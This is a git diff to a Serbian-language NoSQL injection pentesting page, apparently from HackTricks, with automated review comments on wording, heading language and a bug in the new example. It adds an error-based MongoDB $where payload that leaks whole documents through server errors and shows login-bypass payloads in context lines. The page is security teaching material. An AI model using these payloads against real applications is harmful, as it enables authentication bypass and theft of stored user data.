diff --git a/src/pentesting-web/nosql-injection.md b/src/pentesting-web/nosql-injection.md index 3330b7f13..1806ea329 100644 --- a/src/pentesting-web/nosql-injection.md +++ b/src/pentesting-web/nosql-injection.md @@ -84,7 +84,7 @@ Korišćenjem **$func** operatora iz [MongoLite](https://github.com/agentejo/coc ``` ![https://swarm.ptsecurity.com/wp-content/uploads/2021/04/cockpit_auth_check_10.png](<../images/image (933).png>) -### Dobijanje informacija iz različite kolekcije +### Dobijanje informacija iz različitih kolekcija Moguće je koristiti [**$lookup**](https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/) da se dobiju informacije iz različite kolekcije. U sledećem primeru, čitamo iz **različite kolekcije** pod nazivom **`users`** i dobijamo **rezultate svih unosa** sa lozinkom koja odgovara wildcard-u. @@ -108,6 +108,12 @@ Moguće je koristiti [**$lookup**](https://www.mongodb.com/docs/manual/reference } ] ``` +### Error-Based Injection + +Umetnite `throw new Error(JSON.stringify(this))` u `$where` klauzulu da biste eksfiltrirali pune dokumente putem grešaka u JavaScript-u na serverskoj strani (zahteva da aplikacija otkrije greške u bazi podataka). Primer: +```json +{ "$where": "this.username='bob' && this.password=='pwd'; throw new Error(JSON.stringify(this));" } +``` ## MongoDB Payloads Lista [odavde](https://github.com/cr0hn/nosqlinjection_wordlists/blob/master/mongodb_nosqli.txt) @@ -140,7 +146,7 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi {"username": {"$gt":""}, "password": {"$gt":""}} {"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}} ``` -## Slepi NoSQL Skript +## Blind NoSQL Script ```python import requests, string 
@@ -229,5 +235,6 @@ get_password(u) - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection) - [https://nullsweep.com/a-nosql-injection-primer-with-mongo/](https://nullsweep.com/a-nosql-injection-primer-with-mongo/) - [https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb](https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb) +- [https://sensepost.com/blog/2025/nosql-error-based-injection/](https://sensepost.com/blog/2025/nosql-error-based-injection/) {{#include ../banners/hacktricks-training.md}}
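Review bot: In the hunk at -84,7 the renamed heading `### Dobijanje informacija iz različitih kolekcija` is now plural, but the unchanged paragraph directly under it still reads "da se dobiju informacije iz različite kolekcije" and "čitamo iz **različite kolekcije** pod nazivom **`users`**", and the example it introduces reads from one other collection. Either keep the singular heading or update the paragraph in the same change so heading and body agree.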
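Review bot: In the hunk at -108,6 the added JSON example uses a single `=` in `this.username='bob'` while the password test uses `==`. In JavaScript that is an assignment, so the expression overwrites `this.username` instead of comparing it, and the object passed to `JSON.stringify(this)` no longer holds the stored username. The statement before the `;` also has no bearing on whether the `throw` runs. Use `==` on both fields, or cut the example down to the part the text actually describes. Separately, the new heading `### Error-Based Injection` is in English while the paragraph under it is in Serbian. Since the paragraph already states the precondition (the application must expose database errors), a one-line note that returning generic error messages removes this channel would make the section more useful to readers hardening an application.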
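Review bot: In the hunk at -140,7 the heading changes from `## Slepi NoSQL Skript` to `## Blind NoSQL Script`, which puts an English heading into a file whose other visible headings and prose are Serbian (for example `### Dobijanje informacija iz različitih kolekcija`, kept in Serbian by this same diff). Changing the heading text also changes its generated anchor, so any link to the old anchor will break. Please pick one convention for headings in translated files and apply it across the whole diff, and check for inbound links to this section before merging.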